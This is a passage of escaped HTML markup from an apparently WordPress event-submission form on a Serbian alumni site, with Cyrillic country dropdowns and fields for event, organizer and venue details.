>\u0421\u043b\u043e\u0432\u0435\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"sb\" >\u0421\u043e\u043b\u043e\u043c\u043e\u043d\u043e\u0432\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"so\" >\u0421\u043e\u043c\u0430\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"za\" >\u0408\u0443\u0436\u043d\u0430 \u0410\u0444\u0440\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"gs\" >\u0408\u0443\u0436\u043d\u0430 \u040f\u043e\u0440\u045f\u0438\u0458\u0430 \u0438 \u0421\u0435\u043d\u0434\u0432\u0438\u0447 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"es\" >\u0428\u043f\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"lk\" >\u0428\u0440\u043b\u0438 \u041b\u0430\u043d\u043a\u0430<\/option>\r\n\t\t\t<option value=\"sd\" >\u0421\u0443\u0434\u0430\u043d<\/option>\r\n\t\t\t<option value=\"sr\" >\u0421\u0443\u0440\u0438\u043d\u0430\u043c<\/option>\r\n\t\t\t<option value=\"sj\" >\u0421\u0432\u0430\u043b\u0431\u0430\u0440\u0434 \u0438 \u0408\u0430\u043d \u041c\u0430\u0458\u0435\u043d<\/option>\r\n\t\t\t<option value=\"sz\" >\u0421\u0432\u0430\u0437\u0438\u043b\u0435\u043d\u0434<\/option>\r\n\t\t\t<option value=\"se\" >\u0428\u0432\u0435\u0434\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ch\" >\u0428\u0432\u0430\u0458\u0446\u0430\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"sy\" >\u0421\u0438\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"tw\" >\u0422\u0430\u0458\u0432\u0430\u043d<\/option>\r\n\t\t\t<option value=\"tj\" >\u0422\u0430\u045f\u0438\u043a\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"tz\" >\u0422\u0430\u043d\u0437\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"th\" >\u0422\u0430\u0458\u043b\u0430\u043d\u0434<\/option>\r\n\t\t\t<option value=\"tl\" >\u0422\u0438\u043c\u043e\u0440-\u041b\u0435\u0441\u043e\u0442\u043e<\/option>\r\n\t\t\t<option value=\"tg\" >\u0422\u043e\u0433\u043e<\/option>\r\n\t\t\t<option value=\"tk\" >\u0422\u043e\u043a\u0435\u043b\u0430\u0443<\/option>\r\n\t\t\t<option value=\"to\" >\u0422\u043e\u043d\u0433\u043e<\/option>\r\n\t\t\t<option value=\"tt\" >\u0422\u0440\u0438\u043d\u0438\u0434\u0430\u0434 \u0438 \u0422\u043e\u0431\u0430\u0433\u043e<\/option>\r\n\t\t\t<option value=\"tn\" >\u0422\u0443\u043d\u0438\u0446<\/option>\r\n\t\t\t<option value=\"tr\" >\u0422\u0443\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"tm\" >\u0422\u0443\u0440\u043a\u043c\u0435\u043d\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"tc\" >\u0422\u0435\u0440\u043a\u0441 \u0438 \u041a\u0435\u0458\u043a\u043e\u0441<\/option>\r\n\t\t\t<option value=\"tv\" >\u0422\u0443\u0432\u0430\u043b\u0443<\/option>\r\n\t\t\t<option value=\"ug\" >\u0423\u0433\u0430\u043d\u0434\u0430<\/option>\r\n\t\t\t<option value=\"ua\" >\u0423\u043a\u0440\u0430\u0458\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"ae\" >\u0423\u0458\u0435\u0434\u0438\u045a\u0435\u043d\u0438 \u0410\u0440\u0430\u043f\u0441\u043a\u0438 \u0415\u043c\u0438\u0440\u0430\u0442\u0438<\/option>\r\n\t\t\t<option value=\"gb\" >\u0412\u0435\u043b\u0438\u043a\u0430 \u0411\u0440\u0438\u0442\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"us\" >\u0421\u0458\u0435\u0434\u0438\u045a\u0435\u043d\u0435 \u0410\u043c\u0435\u0440\u0438\u0447\u043a\u0435 \u0414\u0440\u0436\u0430\u0432\u0435<\/option>\r\n\t\t\t<option value=\"um\" >\u041c\u0430\u043b\u0430 \u0441\u043f\u043e\u0459\u043d\u0430 \u043e\u0441\u0442\u0440\u0432\u0430 \u0421\u0458\u0435\u0434\u0438\u045a\u0435\u043d\u0438\u0445 \u0410\u043c\u0435\u0440\u0438\u0447\u043a\u0438\u0445 \u0414\u0440\u0436\u0430\u0432\u0430<\/option>\r\n\t\t\t<option value=\"uy\" >\u0423\u0440\u0443\u0433\u0432\u0430\u0458<\/option>\r\n\t\t\t<option value=\"uz\" >\u0423\u0437\u0431\u0435\u043a\u0438\u0441\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"vu\" >\u0412\u0430\u043d\u0443\u0430\u0442\u0443<\/option>\r\n\t\t\t<option value=\"ve\" >\u0412\u0435\u043d\u0435\u0446\u0443\u0435\u043b\u0430<\/option>\r\n\t\t\t<option value=\"vn\" >\u0412\u0438\u0458\u0435\u0442\u043d\u0430\u043c<\/option>\r\n\t\t\t<option value=\"vg\" >\u0414\u0435\u0432\u0438\u0447\u0430\u043d\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430, \u0411\u0440\u0438\u0442\u0430\u043d\u0441\u043a\u0430 \u0442\u0435\u0440\u0438\u0442\u043e\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"vi\" >\u0414\u0435\u0432\u0438\u0447\u0430\u043d\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430, \u0421\u0410\u0414<\/option>\r\n\t\t\t<option value=\"wf\" >\u0412\u0430\u043b\u0438\u0441 \u0438 \u0424\u0443\u0442\u0443\u043d\u0430<\/option>\r\n\t\t\t<option value=\"eh\" >\u0417\u0430\u043f\u0430\u0434\u043d\u0430 \u0421\u0430\u0445\u0430\u0440\u0430<\/option>\r\n\t\t\t<option value=\"ye\" >\u0408\u0435\u043c\u0435\u043d<\/option>\r\n\t\t\t<option value=\"zm\" >\u0417\u0430\u043c\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"zw\" >\u0417\u0438\u043c\u0431\u0430\u0431\u0432\u0435<\/option>\r\n\t\r\n<\/select>\r\n\r\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_banner\">\r\n\t\t\t\t<label for=\"event_banner\">\r\n\t\t\t\t\t\u0420\u0435\u043a\u043b\u0430\u043c\u0430 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\r\n<div class=\"event-manager-uploaded-files\">\r\n\t<\/div>\r\n\r\n<input type=\"file\" class=\"input-text\" data-file_types=\"jpg|jpeg|gif|png\"  name=\"event_banner\" id=\"event_banner\" placeholder=\"\" \/>\r\n\r\n<small class=\"description\">\r\n\tMaximum file size: 256 MB.<\/small>\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_description\">\r\n\t\t\t\t<label for=\"event_description\">\r\n\t\t\t\t\t\u041e\u043f\u0438\u0441<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<div id=\"wp-event_description-wrap\" class=\"wp-core-ui wp-editor-wrap tmce-active\"><link rel='stylesheet' id='dashicons-css' href='https:\/\/alumni.pr.ac.rs\/wp-includes\/css\/dashicons.min.css?ver=6.9.1' type='text\/css' media='all' \/>\n<link rel='stylesheet' id='editor-buttons-css' href='https:\/\/alumni.pr.ac.rs\/wp-includes\/css\/editor.min.css?ver=6.9.1' type='text\/css' media='all' \/>\n<div id=\"wp-event_description-editor-container\" class=\"wp-editor-container\"><textarea class=\"wp-editor-area\" rows=\"8\" autocomplete=\"off\" cols=\"40\" name=\"event_description\" id=\"event_description\"><\/textarea><\/div>\n<\/div>\n\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-registration\">\r\n\t\t\t\t<label for=\"registration\">\r\n\t\t\t\t\t\u0415-\u043c\u0435\u0458\u043b\/URL \u0437\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0458\u0443<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<input type=\"text\" class=\"input-text registration\" name=\"registration\" id=\"registration\" placeholder=\"\u0423\u043d\u0435\u0441\u0438\u0442\u0435 \u043c\u0435\u0458\u043b \u0430\u0434\u0440\u0435\u0441\u0443 \u0438\u043b\u0438 URL \u0441\u0430\u0458\u0442\u0430\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_video_url\">\r\n\t\t\t\t<label for=\"event_video_url\">\r\n\t\t\t\t\t\u0412\u0438\u0434\u0435\u043e URL <small>(optional)<\/small>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t<input type=\"text\" class=\"input-text event_video_url\" name=\"event_video_url\" id=\"event_video_url\" placeholder=\"\u0423\u043d\u0435\u0441\u0438\u0442\u0435 \u0432\u0438\u0434\u0435\u043e URL\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_start_date\">\r\n\t\t\t\t<label for=\"event_start_date\">\r\n\t\t\t\t\t\u0414\u0430\u0442\u0443\u043c \u043f\u043e\u0447\u0435\u0442\u043a\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<div class=\"controls\" style=\"position: relative\">\r\n   <input type=\"text\" class=\"input-text\" name=\"event_start_date\" id=\"event_start_date\" attribute=\"\" placeholder=\"\u041c\u043e\u043b\u0438\u043c \u0443\u043d\u0435\u0441\u0438\u0442\u0435 \u0434\u0430\u0442\u0443\u043c \u043f\u043e\u0447\u0435\u0442\u043a\u0430 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430\" value=\"\" maxlength=\"\" required data-picker=\"datepicker\" \/>\r\n   <\/div>\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_start_time\">\r\n\t\t\t\t<label for=\"event_start_time\">\r\n\t\t\t\t\t\u0412\u0440\u0435\u043c\u0435 \u043f\u043e\u0447\u0435\u0442\u043a\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<div class=\"controls\" style=\"position: relative\">\r\n   <input type=\"text\" class=\"input-text\" name=\"event_start_time\" id=\"event_start_time\" attribute=\"\" placeholder=\"\u041c\u043e\u043b\u0438\u043c \u0443\u043d\u0435\u0441\u0438\u0442\u0435 \u0432\u0440\u0435\u043c\u0435 \u043f\u043e\u0447\u0435\u0442\u043a\u0430 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430\" value=\"\" maxlength=\"\" required data-picker=\"timepicker\" \/>\r\n   <\/div>\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_end_date\">\r\n\t\t\t\t<label for=\"event_end_date\">\r\n\t\t\t\t\t\u0414\u0430\u0442\u0443\u043c \u043a\u0440\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<div class=\"controls\" style=\"position: relative\">\r\n   <input type=\"text\" class=\"input-text\" name=\"event_end_date\" id=\"event_end_date\" attribute=\"\" placeholder=\"\u041c\u043e\u043b\u0438\u043c \u0443\u043d\u0435\u0441\u0438\u0442\u0435 \u0434\u043e\u0433\u0430\u0452\u0430\u0458 \u0438 \u0434\u0430\u0442\u0443\u043c\" value=\"\" maxlength=\"\" required data-picker=\"datepicker\" \/>\r\n   <\/div>\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_end_time\">\r\n\t\t\t\t<label for=\"event_end_time\">\r\n\t\t\t\t\t\u0412\u0440\u0435\u043c\u0435 \u041a\u0440\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<div class=\"controls\" style=\"position: relative\">\r\n   <input type=\"text\" class=\"input-text\" name=\"event_end_time\" id=\"event_end_time\" attribute=\"\" placeholder=\"\u041c\u043e\u043b\u0438\u043c \u0443\u043d\u0435\u0441\u0438\u0442\u0435 \u0434\u0430\u0442\u0443\u043c \u0437\u0430\u0432\u0440\u0448\u0435\u0442\u043a\u0430 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430\" value=\"\" maxlength=\"\" required data-picker=\"timepicker\" \/>\r\n   <\/div>\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_registration_deadline\">\r\n\t\t\t\t<label for=\"event_registration_deadline\">\r\n\t\t\t\t\t\u0420\u043e\u043a \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0458\u0435 <small>(optional)<\/small>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t<div class=\"controls\" style=\"position: relative\">\r\n   <input type=\"text\" class=\"input-text\" name=\"event_registration_deadline\" id=\"event_registration_deadline\" attribute=\"\" placeholder=\"\u041c\u043e\u043b\u0438\u043c \u0443\u043d\u0435\u0441\u0438\u0442\u0435 \u0440\u043e\u043a \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0458\u0435\" value=\"\" maxlength=\"\"  data-picker=\"datepicker\" \/>\r\n   <\/div>\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\r\n\t\t<!-- Organizer Information Fields -->\r\n\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_organizer_ids\">\r\n\t\t\t\t\t\t<h2 class=\"wpem-form-title wpem-heading-text\">Organiser Details<\/h2>\r\n\t\t\t\t\t\t<label for=\"event_organizer_ids\">\r\n\t\t\t\t\t\t\tOrganiser <small>(optional)<\/small>\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\r\n<select multiple=\"multiple\" name=\"event_organizer_ids[]\" id=\"event_organizer_ids\" class=\"event-manager-multiselect\" data-no_results_text=\"No results match\" attribute=\"\" data-multiple_text=\"Select Some Options\">\r\n\t<\/select>\r\n\r\n\t<small class=\"description\">\r\n\t\t<div class=\"wpem-alert wpem-mt-2 wpem-mb-0 wpem-p-0\">If it doesn't show organizer(s). Manage your organizer(s) from <a href=\"#\" class=\"wpem_add_organizer_popup wpem-modal-button\" data-modal-id=\"wpem_add_organizer_popup\">here<\/a><\/div>\t<\/small>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\r\n\t\t<!-- Venue Information Fields -->\r\n\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_venue_ids\">\r\n\t\t\t\t\t\t<h2 class=\"wpem-form-title wpem-heading-text\">Venue Details<\/h2>\r\n\t\t\t\t\t\t<label for=\"event_venue_ids\">\r\n\t\t\t\t\t\t\tVenues <small>(optional)<\/small>\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t<select name=\"event_venue_ids\" id=\"event_venue_ids\"  attribute=\"\">\r\n\r\n\t\t\t<option value=\"\"  selected='selected'>Select Venue<\/option>\r\n\t\r\n<\/select>\r\n\r\n\t<small class=\"description\">\r\n\t\t<div class=\"wpem-alert wpem-mt-2 wpem-mb-0 wpem-p-0\">If it doesn't show venue(s). Manage your venue(s) from <a href=\"#\" class=\"wpem_add_venue_popup wpem-modal-button\" data-modal-id=\"wpem_add_venue_popup\">here<\/a><\/div>\t<\/small>\r\n\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\r\n\t\t<div class=\"wpem-form-footer\">\r\n\t\t\t<input type=\"hidden\" name=\"event_manager_form\" value=\"submit-event\" \/>\r\n\t\t\t<input type=\"hidden\" name=\"event_id\" value=\"0\" \/>\r\n\t\t\t<input type=\"hidden\" name=\"step\" value=\"0\" \/>\r\n\t\t\t<input type=\"submit\" name=\"submit_event\" class=\"wpem-theme-button\" value=\"Preview\" \/>\r\n\t\t<\/div>\r\n\t<input type=\"hidden\" name=\"trp-form-language\" value=\"en\"\/><\/form>\r\n\r\n\r\n\t<div id=\"wpem_add_organizer_popup\" class=\"wpem-modal\" role=\"dialog\" aria-labelledby=\"Add Organizer\">\r\n\t\t<div class=\"wpem-modal-content-wrapper\">\r\n\t\t\t<div class=\"wpem-modal-header\">\r\n\t\t\t\t<div class=\"wpem-modal-header-title\">\r\n\t\t\t\t\t<h3 class=\"wpem-modal-header-title-text\">Add Organizer<\/h3>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"wpem-modal-header-close\"><a href=\"javascript:void(0)\" class=\"wpem-modal-close\" id=\"wpem-modal-close\">x<\/a><\/div>\r\n\t\t\t<\/div>\r\n\t\t\t<div class=\"wpem-modal-content\">\r\n\t\t\t\t<form method=\"post\" id=\"submit-organizer-form\" class=\"wpem-form-wrapper wpem-main event-manager-form\" enctype=\"multipart\/form-data\" action=\"\">\r\n\t\t\t\t\t<h2 class=\"wpem-form-title wpem-heading-text\">Organiser Details<\/h2>\r\n\r\n\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_name\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_name\">\r\n\t\t\t\t\t\t\t\u0418\u043c\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\u0430<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text organizer_name\" name=\"organizer_name\" id=\"organizer_name\" placeholder=\"\u0423\u043d\u0435\u0441\u0438\u0442\u0435 \u0438\u043c\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\u0430\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\">\r\n\t\t\t\t\t\t\t<label for=\"\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\">\r\n\t\t\t\t\t\t\t\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text \u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\" name=\"\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\" id=\"\u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\" placeholder=\"\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_description\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_description\">\r\n\t\t\t\t\t\t\t\u041e\u043f\u0438\u0441 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\u0430<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<div id=\"wp-organizer_description-wrap\" class=\"wp-core-ui wp-editor-wrap tmce-active\"><div id=\"wp-organizer_description-editor-container\" class=\"wp-editor-container\"><textarea class=\"wp-editor-area\" rows=\"8\" autocomplete=\"off\" cols=\"40\" name=\"organizer_description\" id=\"organizer_description\"><\/textarea><\/div>\n<\/div>\n\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_logo\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_logo\">\r\n\t\t\t\t\t\t\t\u041b\u043e\u0433\u043e <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t\r\n<div class=\"event-manager-uploaded-files\">\r\n\t<\/div>\r\n\r\n<input type=\"file\" class=\"input-text\" data-file_types=\"jpg|jpeg|gif|png\"  name=\"organizer_logo\" id=\"organizer_logo\" placeholder=\"\" \/>\r\n\r\n<small class=\"description\">\r\n\tMaximum file size: 256 MB.<\/small>\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-organizer_country\">\r\n\t\t\t\t\t\t\t<label for=\"organizer_country\">\r\n\t\t\t\t\t\t\t\u0417\u0435\u043c\u0459\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0442\u043e\u0440\u0430<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<select name=\"organizer_country\" id=\"organizer_country\" required attribute=\"\">\r\n\r\n\t\t\t<option value=\"\"  selected='selected'>\u0418\u0437\u0430\u0431\u0435\u0440\u0438\u0442\u0435 \u0437\u0435\u043c\u0459\u0443<\/option>\r\n\t\t\t<option value=\"af\" >\u0410\u0444\u0433\u0430\u043d\u0438\u0441\u0430\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"ax\" >\u0410\u043b\u0430\u043d\u0434\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"al\" >\u0410\u043b\u0431\u0430\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"dz\" >\u0410\u043b\u0436\u0438\u0440<\/option>\r\n\t\t\t<option value=\"as\" >\u0410\u043c\u0435\u0440\u0438\u0447\u043a\u0430 \u0421\u0430\u043c\u043e\u0430<\/option>\r\n\t\t\t<option value=\"ad\" >\u0410\u043d\u0434\u043e\u0440\u0430<\/option>\r\n\t\t\t<option value=\"ao\" >\u0410\u043d\u0433\u043e\u043b\u0430<\/option>\r\n\t\t\t<option value=\"ai\" >\u0410\u043d\u0433\u0438\u043b\u0430<\/option>\r\n\t\t\t<option value=\"aq\" >\u0410\u043d\u0442\u0430\u0440\u0442\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"ag\" >\u0410\u043d\u0442\u0438\u0433\u0443\u0430 \u0438 \u0411\u0430\u0440\u0431\u0443\u0434\u0430<\/option>\r\n\t\t\t<option value=\"ar\" >\u0410\u0440\u0433\u0435\u043d\u0442\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"am\" >\u0408\u0435\u0440\u043c\u0435\u043d\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"aw\" >\u0410\u0440\u0443\u0431\u0430<\/option>\r\n\t\t\t<option value=\"au\" >\u0410\u0443\u0441\u0442\u0440\u0430\u043b\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"at\" >\u0410\u0443\u0441\u0442\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"az\" >\u0410\u0437\u0435\u0440\u0431\u0435\u0458\u045f\u0430\u043d<\/option>\r\n\t\t\t<option value=\"bs\" >\u0411\u0430\u0445\u0430\u043c\u0438<\/option>\r\n\t\t\t<option value=\"bh\" >\u0411\u0430\u0445\u0440\u0435\u0438\u043d<\/option>\r\n\t\t\t<option value=\"bd\" >\u0411\u0430\u043d\u0433\u043b\u0430\u0434\u0435\u0448<\/option>\r\n\t\t\t<option value=\"bb\" >\u0411\u0430\u0440\u0431\u0430\u0434\u043e\u0441<\/option>\r\n\t\t\t<option value=\"by\" >\u0411\u0435\u043b\u043e\u0440\u0443\u0441\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"be\" >\u0411\u0435\u043b\u0433\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"bz\" >\u0411\u0435\u043b\u0438\u0437\u0435<\/option>\r\n\t\t\t<option value=\"bj\" >\u0411\u0435\u043d\u0438\u043d<\/option>\r\n\t\t\t<option value=\"bm\" >\u0411\u0435\u0440\u043c\u0443\u0434\u0430<\/option>\r\n\t\t\t<option value=\"bt\" >\u0411\u0443\u0442\u0430\u043d<\/option>\r\n\t\t\t<option value=\"bo\" >\u0411\u043e\u043b\u0438\u0432\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"ba\" >\u0411\u043e\u0441\u043d\u0430 \u0438 \u0425\u0435\u0440\u0446\u0435\u0433\u043e\u0432\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"bw\" >\u0411\u043e\u0446\u0432\u0430\u043d\u0430<\/option>\r\n\t\t\t<option value=\"bv\" >\u0411\u0443\u0432\u0435\u0442\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"br\" >\u0411\u0440\u0430\u0437\u0438\u043b<\/option>\r\n\t\t\t<option value=\"io\" >\u0411\u0440\u0438\u0442\u0430\u043d\u0441\u043a\u0430 \u0418\u043d\u0434\u0438\u0458\u0441\u043a\u0430 \u041f\u043e\u043c\u043e\u0440\u0441\u043a\u0430 \u0422\u0435\u0440\u0438\u0442\u043e\u0440\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"bn\" >\u0411\u0440\u0443\u043d\u0435\u0458 \u0414\u0430\u0440\u0443\u0441\u0430\u043b\u0430\u043c<\/option>\r\n\t\t\t<option value=\"bg\" >\u0411\u0443\u0433\u0430\u0440\u0441\u043a\u0430<\/option>\r\n\t\t\t<option value=\"bf\" >\u0411\u0443\u0440\u043a\u0438\u043d\u0430 \u0424\u0430\u0441\u043e<\/option>\r\n\t\t\t<option value=\"bi\" >\u0411\u0443\u0440\u0443\u043d\u0434\u0438<\/option>\r\n\t\t\t<option value=\"kh\" >\u041a\u0430\u043c\u0431\u043e\u045f\u0430<\/option>\r\n\t\t\t<option value=\"cm\" >\u041a\u0430\u043c\u0435\u0440\u0443\u043d<\/option>\r\n\t\t\t<option value=\"ca\" >\u041a\u0430\u043d\u0430\u0434\u0430<\/option>\r\n\t\t\t<option value=\"cv\" >\u041a\u0430\u043f\u0435 \u0412\u0435\u0440\u0434\u0435<\/option>\r\n\t\t\t<option value=\"ky\" >\u041a\u0430\u0458\u043c\u0430\u043d\u0441\u043a\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cf\" >\u0426\u0435\u043d\u0442\u0440\u0430\u043b\u043d\u043e\u0430\u0444\u0440\u0438\u0447\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430<\/option>\r\n\t\t\t<option value=\"td\" >\u0427\u0430\u0434<\/option>\r\n\t\t\t<option value=\"cl\" >\u0427\u0438\u043b\u0435<\/option>\r\n\t\t\t<option value=\"cn\" >\u041a\u0438\u043d\u0430<\/option>\r\n\t\t\t<option value=\"cx\" >\u0411\u043e\u0436\u0438\u045b\u043d\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"cc\" >\u041a\u043e\u043a\u043e\u0441 (\u041a\u0438\u043b\u0438\u043d\u0433\u043e\u0432\u0430) \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option value=\"co\" >\u041a\u043e\u043b\u0443\u043c\u0431\u0438\u0458\u0430<\/option>\r\n\t\t\t<option value=\"km\" >\u041a\u043e\u043c\u043e\u0440\u0438<\/option>\r\n\t\t\t<option value=\"cg\" >\u041a\u043e\u043d\u0433\u043e<\/option>\r\n\t\t\t<option value=\"cd\" >\u0414\u0435\u043c\u043e\u043a\u0440\u0430\u0442\u0441\u043a\u0430 \u0420\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430 \u041a\u043e\u043d\u0433\u043e<\/option>\r\n\t\t\t<option value=\"ck\" >\u041a\u0443\u043a\u043e\u0432\u0430 \u041e\u0441\u0442\u0440\u0432\u0430<\/option>\r\n\t\t\t<option 